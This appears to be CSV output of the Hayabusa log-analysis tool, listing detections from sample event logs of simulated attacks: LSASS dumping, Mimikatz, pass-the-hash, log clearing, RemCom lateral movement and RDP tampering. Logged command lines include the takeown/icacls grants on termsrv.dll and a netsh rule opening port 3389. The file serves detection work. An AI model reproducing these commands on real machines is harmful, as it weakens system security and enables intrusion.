2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
